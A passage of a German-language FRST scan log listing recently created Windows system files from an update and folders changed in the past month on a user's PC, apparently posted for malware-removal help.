2017-07-11 20:54 - 2017-06-20 07:06 - 000754592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000278944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000438096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2017-07-11 20:54 - 2017-06-20 07:04 - 002330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 001178528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 001177600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 001077496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webservices.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 000181656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 000049656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msasn1.dll
2017-07-11 20:54 - 2017-06-20 07:03 - 002077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-07-11 20:54 - 2017-06-20 07:03 - 000443728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll
2017-07-11 20:54 - 2017-06-20 07:02 - 001121928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2017-07-11 20:54 - 2017-06-20 07:02 - 000354400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll
2017-07-11 20:54 - 2017-06-20 07:00 - 002597888 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2017-07-11 20:54 - 2017-06-20 06:59 - 001674240 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2017-07-11 20:54 - 2017-06-20 06:56 - 000985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-07-11 20:54 - 2017-06-20 06:49 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctfuimanager.dll
2017-07-11 20:54 - 2017-06-20 06:49 - 000331776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2017-07-11 20:54 - 2017-06-20 06:46 - 000132096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll
2017-07-11 20:54 - 2017-06-20 06:45 - 000111104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Profile.RetailInfo.dll
2017-07-11 20:54 - 2017-06-20 06:45 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000173568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ClipboardServer.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000151552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincredui.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000052224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dataclen.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000641024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certca.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000387584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Payments.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000121856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sendmail.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000734208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe
2017-07-11 20:54 - 2017-06-20 06:41 - 000646656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApi.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000601088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000433152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000201216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovhost.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000342016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000247808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000230912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edputil.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000038400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerUI.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 002814464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\themeui.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 000969728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 000646144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2017-07-11 20:54 - 2017-06-20 06:39 - 000471040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VAN.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2017-07-11 20:54 - 2017-06-20 06:38 - 001451008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 001285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 001171968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certutil.exe
2017-07-11 20:54 - 2017-06-20 06:38 - 000663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 000648192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SmartcardCredentialProvider.dll
2017-07-11 20:54 - 2017-06-20 06:37 - 002008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-07-11 20:54 - 2017-06-20 06:35 - 002679296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2017-07-11 20:54 - 2017-06-20 06:35 - 002132480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2017-07-11 20:54 - 2017-06-20 06:35 - 000050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 002750464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 001492480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2017-07-11 20:54 - 2017-06-20 06:31 - 000334848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll
2017-07-11 20:54 - 2017-06-20 06:30 - 000209920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdmaud.drv
2017-07-11 20:54 - 2017-06-20 06:30 - 000157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpchttp.dll
2017-07-11 20:54 - 2017-06-20 06:30 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-07-11 20:54 - 2017-06-20 06:28 - 000584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apphelp.dll
2017-07-11 20:53 - 2017-07-07 09:27 - 001147288 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-07-11 20:53 - 2017-07-07 09:27 - 001024928 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-07-11 20:53 - 2017-07-07 09:27 - 000965024 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi
2017-07-11 20:53 - 2017-07-07 09:27 - 000821664 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe
2017-07-11 20:53 - 2017-07-07 09:27 - 000750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-07-11 20:53 - 2017-07-07 09:26 - 001065104 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2017-07-11 20:53 - 2017-07-07 09:25 - 000899824 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2017-07-11 20:53 - 2017-07-07 09:22 - 001186464 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2017-07-11 20:53 - 2017-07-07 09:17 - 001017760 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2017-07-11 20:53 - 2017-07-07 09:14 - 001760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-07-11 20:53 - 2017-07-07 09:14 - 001171032 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcomp.dll
2017-07-11 20:53 - 2017-07-07 09:13 - 000147800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Clipc.dll
2017-07-11 20:53 - 2017-07-07 09:12 - 000228256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2017-07-11 20:53 - 2017-07-07 09:10 - 000372128 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-07-11 20:53 - 2017-07-07 09:09 - 000041376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininitext.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 001640448 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000859136 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000577024 _____ (Microsoft Corporation) C:\WINDOWS\system32\duser.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000443392 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulationExtensions.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000360960 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConhostV2.dll
2017-07-11 20:53 - 2017-07-07 08:23 - 000029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapprovp.dll
2017-07-11 20:53 - 2017-07-07 08:22 - 000520704 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-07-11 20:53 - 2017-07-07 08:21 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncCsp.dll
2017-07-11 20:53 - 2017-07-07 08:19 - 000256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-07-11 20:53 - 2017-07-07 08:19 - 000137216 _____ (Microsoft Corporation) C:\WINDOWS\system32\raschap.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 000563712 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicePairing.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Wldap32.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsExt.dll
2017-07-11 20:53 - 2017-07-07 08:15 - 000922112 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2017-07-11 20:53 - 2017-07-07 08:13 - 005892096 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2017-07-11 20:53 - 2017-07-07 08:13 - 000840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 003307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 002499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 001713664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 001420800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 003139584 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 002829824 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 002649600 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 002177024 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpcServices.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 001888256 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2017-07-11 20:53 - 2017-07-07 08:07 - 000430080 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll
2017-07-11 20:53 - 2017-07-07 08:07 - 000391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPhoto.dll
2017-07-11 20:53 - 2017-07-07 08:05 - 000370176 _____ (Microsoft Corporation) C:\WINDOWS\system32\msinfo32.exe
2017-07-11 20:53 - 2017-07-07 08:04 - 001703424 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2017-07-11 20:53 - 2017-07-07 08:04 - 001403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdc.dll
2017-07-11 20:53 - 2017-07-07 08:04 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll
2017-07-11 20:53 - 2017-07-02 00:52 - 000031932 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-07-11 20:53 - 2017-06-20 08:18 - 001564576 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2017-07-11 20:53 - 2017-06-20 08:18 - 000096672 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2017-07-11 20:53 - 2017-06-20 08:17 - 000629152 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000544160 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000334240 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000136096 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000034720 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2017-07-11 20:53 - 2017-06-20 08:16 - 001214880 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2017-07-11 20:53 - 2017-06-20 08:16 - 000335776 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll
2017-07-11 20:53 - 2017-06-20 08:15 - 000233376 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2017-07-11 20:53 - 2017-06-20 08:11 - 001395152 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2017-07-11 20:53 - 2017-06-20 08:10 - 001930320 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2017-07-11 20:53 - 2017-06-20 08:05 - 001057832 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll
2017-07-11 20:53 - 2017-06-20 08:04 - 004847424 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-07-11 20:53 - 2017-06-20 08:03 - 000179608 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll
2017-07-11 20:53 - 2017-06-20 08:03 - 000102312 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredentialUIBroker.exe
2017-07-11 20:53 - 2017-06-20 08:02 - 000426912 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2017-07-11 20:53 - 2017-06-20 08:00 - 000558920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll
2017-07-11 20:53 - 2017-06-20 08:00 - 000255904 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2017-07-11 20:53 - 2017-06-20 08:00 - 000142752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2017-07-11 20:53 - 2017-06-20 07:59 - 000583304 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2017-07-11 20:53 - 2017-06-20 07:58 - 000833160 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll
2017-07-11 20:53 - 2017-06-20 07:58 - 000406072 _____ (Microsoft Corporation) C:\WINDOWS\system32\MMDevAPI.dll
2017-07-11 20:53 - 2017-06-20 07:58 - 000203168 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll
2017-07-11 20:53 - 2017-06-20 07:16 - 000970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctfuimanager.dll
2017-07-11 20:53 - 2017-06-20 07:16 - 000417280 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacc.dll
2017-07-11 20:53 - 2017-06-20 07:15 - 001620368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2017-07-11 20:53 - 2017-06-20 07:14 - 001150784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2017-07-11 20:53 - 2017-06-20 07:14 - 000032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mskssrv.sys
2017-07-11 20:53 - 2017-06-20 07:13 - 000216064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll
2017-07-11 20:53 - 2017-06-20 07:13 - 000081408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll
2017-07-11 20:53 - 2017-06-20 07:13 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgr.dll
2017-07-11 20:53 - 2017-06-20 07:12 - 000144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Profile.RetailInfo.dll
2017-07-11 20:53 - 2017-06-20 07:11 - 000200192 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScDeviceEnum.dll
2017-07-11 20:53 - 2017-06-20 07:10 - 000315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-07-11 20:53 - 2017-06-20 07:10 - 000188928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincredui.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000555008 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgrSvc.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000250368 _____ (Microsoft Corporation) C:\WINDOWS\system32\SCardSvr.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000205312 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipboardServer.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\certprop.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000135680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sendmail.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\dataclen.dll
2017-07-11 20:53 - 2017-06-20 07:08 - 000791040 _____ (Microsoft Corporation) C:\WINDOWS\system32\certca.dll
2017-07-11 20:53 - 2017-06-20 07:07 - 000916992 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2017-07-11 20:53 - 2017-06-20 07:07 - 000757248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2017-07-11 20:53 - 2017-06-20 07:07 - 000626176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2017-07-11 20:53 - 2017-06-20 07:07 - 000621056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll
2017-07-11 20:53 - 2017-06-20 07:07 - 000411136 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000455680 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000335872 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinDataModelServer.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000299520 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000253440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edputil.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerUI.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 002873344 _____ (Microsoft Corporation) C:\WINDOWS\system32\themeui.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 000873472 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 000696320 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2017-07-11 20:53 - 2017-06-20 07:05 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 001818624 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 001425920 _____ (Microsoft Corporation) C:\WINDOWS\system32\certutil.exe
2017-07-11 20:53 - 2017-06-20 07:04 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmartcardCredentialProvider.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 000802816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 000400896 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 000178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeHelper.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 000681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 000081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinAUG.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 003803136 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 003332096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 003059200 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 001076736 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 000397312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2017-07-11 20:53 - 2017-06-20 07:00 - 003057664 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2017-07-11 20:53 - 2017-06-20 07:00 - 002171392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2017-07-11 20:53 - 2017-06-20 06:57 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2017-07-11 20:53 - 2017-06-20 06:57 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMPushRouterCore.dll
2017-07-11 20:53 - 2017-06-20 06:56 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdmaud.drv

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-08-09 18:59 - 2017-03-23 02:42 - 000000000 ____D C:\FRST
2017-08-09 18:57 - 2017-04-19 20:10 - 000000000 ____D C:\ProgramData\NVIDIA
2017-08-09 18:56 - 2015-03-01 21:28 - 000000000 ____D C:\Users\***\AppData\Roaming\Skype
2017-08-09 18:55 - 2017-03-18 23:01 - 000000000 ____D C:\WINDOWS\INF
2017-08-09 18:55 - 2015-11-03 03:16 - 000000000 ____D C:\AdwCleaner
2017-08-09 18:54 - 2016-07-13 19:39 - 000000000 ____D C:\Users\***\AppData\Local\Spotify
2017-08-09 18:53 - 2016-07-13 19:39 - 000000000 ____D C:\Users\***\AppData\Roaming\Spotify
2017-08-09 18:47 - 2017-04-19 20:20 - 004124406 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-08-09 18:47 - 2017-03-20 06:35 - 002023472 _____ C:\WINDOWS\system32\perfh007.dat
2017-08-09 18:47 - 2017-03-20 06:35 - 000514080 _____ C:\WINDOWS\system32\perfc007.dat
2017-08-09 18:46 - 2017-03-18 23:03 - 000000000 ___HD C:\Program Files\WindowsApps
2017-08-09 18:46 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-08-09 18:46 - 2015-02-06 18:49 - 000000000 ____D C:\Users\***\AppData\Local\Packages
2017-08-09 18:40 - 2017-04-19 20:15 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-08-09 18:40 - 2017-04-19 20:10 - 000000000 ____D C:\Users\***
2017-08-09 18:40 - 2017-04-19 20:09 - 000248024 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-08-08 23:15 - 2017-04-19 20:09 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2017-08-08 23:04 - 2015-02-07 15:26 - 000000000 ____D C:\Users\***\AppData\Roaming\Dropbox
2017-08-08 20:32 - 2015-04-10 22:33 - 000000000 ____D C:\Users\***\AppData\Roaming\TS3Client
2017-08-08 19:54 - 2015-02-06 18:47 - 000000000 __RHD C:\Users\Public\AccountPictures
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\oobe
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\ShellExperiences
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-08-08 19:53 - 2017-03-18 13:40 - 001048576 _____ C:\WINDOWS\system32\config\BBI
2017-08-08 19:28 - 2017-05-09 20:16 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-08-08 19:28 - 2015-02-06 20:57 - 000000000 ____D C:\WINDOWS\system32\MRT
2017-08-08 19:26 - 2015-02-06 20:57 - 140394280 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-08-08 17:25 - 2017-04-19 20:15 - 000004182 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{87C32643-1831-40C5-90AB-019E81221598}
2017-08-07 23:51 - 2017-03-11 14:12 - 000000000 ____D C:\ProgramData\IObit
2017-08-07 23:51 - 2015-03-15 23:24 - 000000000 ____D C:\Users\***\AppData\Roaming\IObit
2017-08-07 23:51 - 2015-03-15 23:24 - 000000000 ____D C:\Users\***\AppData\LocalLow\IObit
2017-08-07 23:31 - 2015-03-09 00:28 - 000000000 ____D C:\Users\***\AppData\Local\Ubisoft Game Launcher
